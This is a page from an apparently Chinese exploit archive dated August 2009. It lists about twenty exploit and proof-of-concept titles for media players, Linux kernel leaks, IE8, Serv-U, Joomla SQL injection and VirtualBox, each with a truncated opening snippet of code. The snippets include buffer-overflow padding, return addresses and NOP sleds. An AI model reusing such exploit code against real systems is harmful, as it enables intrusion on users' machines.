JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) 
	 
 
 
 
  
				日期:2009-08-07 11:16:35 
点击:30 评论:0 
				 
				 
 
 
#!/usr/bin/env python ########################################################################################### # # JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH) # Coded By: Dr_IDE # Found By: HACK4LOVE # Tested on Windows XP SP2 # ### 
 
 
 
 
 
 
	
		
		jetAudio 7.1.9.4030 plus vx (.m3u) Universal BOF Exploit (SEH) 
	 
 
 
 
  
				日期:2009-08-07 11:14:54 
点击:1037 评论:0 
				 
				 
 
 
#!/usr/bin/perl #soft: jetAudio v 7.1.9.4030 plus vx (.m3u ) universal buffer Overflow exploit (SEH) #based on: HACK4LOVE (http://www.milw0rm.com/exploits/9359) #exploited by: germaya_x tested on: xp sp3 (EN) #bug date: August 05 09 #greetz: hack4lov 
 
 
 
 
 
 
	
		
		UltraPlayer Media Player 2.112 Local Buffer Overflow PoC 
	 
 
 
 
  
				日期:2009-08-06 10:03:21 
点击:106 评论:0 
				 
				 
 
 
#!/usr/bin/perl #UltraPlayer Media Player 2.112 #Coded by SarBoT511 #Download : http://download.cnet.com/UltraPlayer-Media-Player/3000-2139_4-10041974.html?tag=mncol #GreatZ [ 2] : nEt^DeV!L [s4udi~cod3r] , dev1l fucker , The gobL!n , alM511 , BlacK 
 
 
 
 
 
 
	
		
		jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow (SEH) 
	 
 
 
 
  
				日期:2009-08-06 10:00:43 
点击:1151 评论:0 
				 
				 
 
 
# [+] Vulnerability : jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow # [+] Detected by : HACK4LOVE ( http://www.milw0rm.com/exploits/9359 ) # [+] Product : jetAudio # [+] Versions affected : 7.1.9.4030 plus vx # [+] --------------------- 
 
 
 
 
 
 
	
		
		Tuniac v.090517c (.M3U File) Local File Crash PoC 
	 
 
 
 
  
				日期:2009-08-06 09:59:09 
点击:27 评论:0 
				 
				 
 
 
#!/usr/bin/env python ############################################################################################## # # Tuniac v.090517c (.M3U) Crash PoC # Found By: Dr_IDE # http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_0 
 
 
 
 
 
 
	
		
		Linux Kernel < 2.6.14.6 procfs Kernel Memory Disclosure Exploit 
	 
 
 
 
  
				日期:2009-08-06 09:58:22 
点击:53 评论:0 
				 
				 
 
 
/* * cve-2005-4605.c * * Linux Kernel 2.6.14.6 procfs Kernel Memory Disclosure * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4605 * * The procfs code (proc_mi 
 
 
 
 
 
 
	
		
		MS Internet Explorer 8.0.7100.0 Simple HTML Remote Crash PoC 
	 
 
 
 
  
				日期:2009-08-06 09:57:22 
点击:59 评论:0 
				 
				 
 
 
Veryfied with IE8.0.7100.0 on W7 x64 RC. !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01 Transitional http://www.w3.org/TR/html4/strict.dtd html body div style = width: 100%; max-height: 400px; overflow: scroll; script type=text/javascript src=nichtvorha 
 
 
 
 
 
 
	
		
		serv-u8 本地提权 
	 
 
 
 
  
				日期:2009-08-05 17:47:01 
点击:55 评论:0 
				 
				 
 
 
发布日期: 2009-08-05 更新日期: 2009-08-05 受影响系统: serv-u8 不受影响系统: 其他版本不受影响 描述: 看cnbeta发现su出8这个版本了。 想想以前写过一个7的本地提权。 不知道8有什么安全方面的更改。 下载来研究下,发现居然还是可以提权的,只是su7的那个不能 
 
 
 
 
 
 
	
		
		RadASM 2.2.1.6 Menu Editor (.mnu) Stack Overflow PoC 
	 
 
 
 
  
				日期:2009-08-05 11:05:29 
点击:38 评论:0 
				 
				 
 
 
# RadASM 2.2.1.6 Menu Editor (.mnu) file stack overlow PoC # Coded by Pankaj Kohli # http://www.pank4j.com $str=Ax146; $file=sploit.mnu; open(my $FILE, $file) or die Error opening file.n; print $FILE $str ; close($FILE); print $file has been created. 
 
 
 
 
 
 
	
		
		BlazeDVD 5.1/HDTV Player 6.0 (.PLF File) Universal 
	 
 
 
 
  
				日期:2009-08-05 11:04:58 
点击:74 评论:0 
				 
				 
 
 
#!/usr/bin/perl # by ThE g0bL!N #THNX: His0k4 Wahdo :) #BlazeDVD 5.1 Professional/Blaze HDTV Player 6.0 /(.PLF File) Universal Buffer Overflow Exploit (SEH) ################################################################## my $bof=x41 x 608; my $nsh 
 
 
 
 
 
 
	
		
		jetAudio 7.1.9.4030 plus vx (.m3u) Local Buffer Overflow PoC 
	 
 
 
 
  
				日期:2009-08-05 11:04:27 
点击:45 评论:0 
				 
				 
 
 
#!/usr/bin/perl # Found By :: HACK4LOVE # hack4love@hotmail.com # jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow PoC ######################################################################################## ##EAX 01052C10 ASCII ##ECX 007B0 
 
 
 
 
 
 
	
		
		MediaCoder 0.7.1.4486 (.lst) Universal Buffer Overflow Exploit (SEH) 
	 
 
 
 
  
				日期:2009-08-05 11:03:00 
点击:26 评论:0 
				 
				 
 
 
#!/usr/bin/perl #[+] Bug : MediaCoder 0.7.1.4486 (.lst) Universal Buffer overflow (SEH) #[+] Author : germaya_x #[+] Greetz : hack4love #[+] tested on: sp3 (EN) ########################################################## # win32_exec - EXITFUNC=seh C 
 
 
 
 
 
 
	
		
		Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit 
	 
 
 
 
  
				日期:2009-08-05 11:01:58 
点击:34 评论:0 
				 
				 
 
 
/* * sigaltstack-leak.c * * Linux Kernel = 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 * * Ulri 
 
 
 
 
 
 
	
		
		Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH) 
	 
 
 
 
  
				日期:2009-08-04 11:42:32 
点击:50 评论:0 
				 
				 
 
 
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Blaze HDTV Player 6.0 (.PLF File) Local Buffer Overflow Exploit (SEH) # ## easy ## ###Thanks for SkuLL-HacKeR ####and all WwW.Sec-ArT.CoM/cc team ##AND special THANKS FOR EL7ADRANY ##AND 3ASFH 
 
 
 
 
 
 
	
		
		RadASM 2.2.1.5 (.mnu File) Local Format String PoC 
	 
 
 
 
  
				日期:2009-08-04 11:41:55 
点击:30 评论:0 
				 
				 
 
 
# RadASM 2.2.1.5 (.mnu File) Format string Poc # By SkuLL-HacKeR # GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi # EAX 00002E2E # ECX 41413D92 ECX overwrited # EDX 00000002 # EBX 00000000 # ESP 0013F894 # EBP 0013F9AC ASCII ................... 
 
 
 
 
 
 
	
		
		MediaCoder 0.6.2.4275 (.lst File) Stack Buffer Overflow Exploit 
	 
 
 
 
  
				日期:2009-08-04 11:40:34 
点击:54 评论:0 
				 
				 
 
 
#!/usr/bin/perl # MediaCoder 0.6.2.4275 .lst Stack Based Overflow # Discovered by :[ SKULL-HACKER ] my $header = x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Ax46x69x6Cx65x31x3D; my $junk = x41 x 254; my $ret = x93x43x92x7c; # my $nop = x90 
 
 
 
 
 
 
	
		
		Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH) 
	 
 
 
 
  
				日期:2009-08-04 11:39:57 
点击:23 评论:0 
				 
				 
 
 
#!/usr/bin/python # _ _ _ __ _ _ _ #| || | (_) ___ /  | |__ | | | #| __ | | | (_- | () | | / / |_ _| #|_||_| |_| /__/ __/ |__ |_| # #[+] Bug : Amaya 11.2 W3C Editor/Browser (defer) Remote BOF Exploit (SEH) #[+] Tested on : Xp sp3 (en) under (vb) 
 
 
 
 
 
 
	
		
		Joomla Component com_jfusion (Itemid) Blind SQL Injection Vuln 
	 
 
 
 
  
				日期:2009-08-03 12:16:49 
点击:81 评论:1 
				 
				 
 
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ####################### 
 
 
 
 
 
 
	
		
		VirtualBox 2.2 - 3.0.2 r49928 Local Host Reboot PoC 
	 
 
 
 
  
				日期:2009-08-03 12:16:13 
点击:44 评论:0 
				 
				 
 
 
Sun's VirtualBox host reboot PoC by Tadas Vilkeliskis vilkeliskis.t@gmail.com Disclosure made at 2009-08-01 VULNERABILITY INFORMATION Remotely exploitable: no Locally exploitable: yes Affected versions: 2.2 - 3.0.2 r49928 for Linux VULNERABILITY DES 
 
  
 
 
 
 共637页/12733条记录  首页 
 上一页 
 [433] 
[434] 
[435] 
436
[437] 
[438] 
[439] 
 下一页 
 末页 
 
1 
2 
3 
4 
5 
6 
7 
8 
9 
10 
11 
12 
13 
14 
15 
16 
17 
18 
19 
20 
21 
22 
23 
24 
25 
26 
27 
28 
29 
30 
31 
32 
33 
34 
35 
36 
37 
38 
39 
40 
41 
42 
43 
44 
45 
46 
47 
48 
49 
50 
51 
52 
53 
54 
55 
56 
57 
58 
59 
60 
61 
62 
63 
64 
65 
66 
67 
68 
69 
70 
71 
72 
73 
74 
75 
76 
77 
78 
79 
80 
81 
82 
83 
84 
85 
86 
87 
88 
89 
90 
91 
92 
93 
94 
95 
96 
97 
98 
99 
100 
101 
102 
103 
104 
105 
106 
107 
108 
109 
110 
111 
112 
113 
114 
115 
116 
117 
118 
119 
120 
121 
122 
123 
124 
125 
126 
127 
128 
129 
130 
131 
132 
133 
134 
135 
136 
137 
138 
139 
140 
141 
142 
143 
144 
145 
146 
147 
148 
149 
150 
151 
152 
153 
154 
155 
156 
157 
158 
159 
160 
161 
162 
163 
164 
165 
166 
167 
168 
169 
170 
171 
172 
173 
174 
175 
176 
177 
178 
179 
180 
181 
182 
183 
184 
185 
186 
187 
188 
189 
190 
191 
192 
193 
194 
195 
196 
197 
198 
199 
200 
201 
202 
203 
204 
205 
206 
207 
208 
209 
210 
211 
212 
213 
214 
215 
216 
217 
218 
219 
220 
221 
222 
223 
224 
225 
226 
227 
228 
229 
230 
231 
232 
233 
234 
235 
236 
237 
238 
239 
240 
241 
242 
243 
244 
245 
246 
247 
248 
249 
250 
251 
252 
253 
254 
255 
256 
257 
258 
259 
260 
261 
262 
263 
264 
265 
266 
267 
268 
269 
270 
271 
272 
273 
274 
275 
276 
277 
278 
279 
280 
281 
282 
283 
284 
285 
286 
287 
288 
289 
290 
291 
292 
293 
294 
295 
296 
297 
298 
299 
300 
301 
302 
303 
304 
305 
306 
307 
308 
309 
310 
311 
312 
313 
314 
315 
316 
317 
318 
319 
320 
321 
322 
323 
324 
325 
326 
327 
328 
329 
330 
331 
332 
333 
334 
335 
336 
337 
338 
339 
340 
341 
342 
343 
344 
345 
346 
347 
348 
349 
350 
351 
352 
353 
354 
355 
356 
357 
358 
359 
360 
361 
362 
363 
364 
365 
366 
367 
368 
369 
370 
371 
372 
373 
374 
375 
376 
377 
378 
379 
380 
381 
382 
383 
384 
385 
386 
387 
388 
389 
390 
391 
392 
393 
394 
395 
396 
397 
398 
399 
400 
401 
402 
403 
404 
405 
406 
407 
408 
409 
410 
411 
412 
413 
414 
415 
416 
417 
418 
419 
420 
421 
422 
423 
424 
425 
426 
427 
428 
429 
430 
431 
432 
433 
434 
435 
436 
437 
438 
439 
440 
441 
442 
443 
444 
445 
446 
447 
448 
449 
450 
451 
452 
453 
454 
455 
456 
457 
458 
459 
460 
461 
462 
463 
464 
465 
466 
467 
468 
469 
470 
471 
472 
473 
474 
475 
476 
477 
478 
479 
480 
481 
482 
483 
484 
485 
486 
487 
488 
489 
490 
491 
492 
493 
494 
495 
496 
497 
498 
499 
500 
501 
502 
503 
504 
505 
506 
507 
508 
509 
510 
511 
512 
513 
514 
515 
516 
517 
518 
519 
520 
521 
522 
523 
524 
525 
526 
527 
528 
529 
530 
531 
532 
533 
534 
535 
536 
537 
538 
539 
540 
541 
542 
543 
544 
545 
546 
547 
548 
549 
550 
551 
552 
553 
554 
555 
556 
557 
558 
559 
560 
561 
562 
563 
564 
565 
566 
567 
568 
569 
570 
571 
572 
573 
574 
575 
576 
577 
578 
579 
580 
581 
582 
583 
584 
585 
586 
587 
588 
589 
590 
591 
592 
593 
594 
595 
596 
597 
598 
599 
600 
601 
602 
603 
604 
605 
606 
607 
608 
609 
610 
611 
612 
613 
614 
615 
616 
617 
618 
619 
620 
621 
622 
623 
624 
625 
626 
627 
628 
629 
630 
631 
632 
633 
634 
635 
636 
637 
  
 
 
 
		
 
 
 
  
本月热点文章  
 
 
 
 
 
 
   
 
 
 
 
 
 
  
本月推荐文章  
 
 
 
 
 
 
    
 
 
	
 
 
 
  
相关分类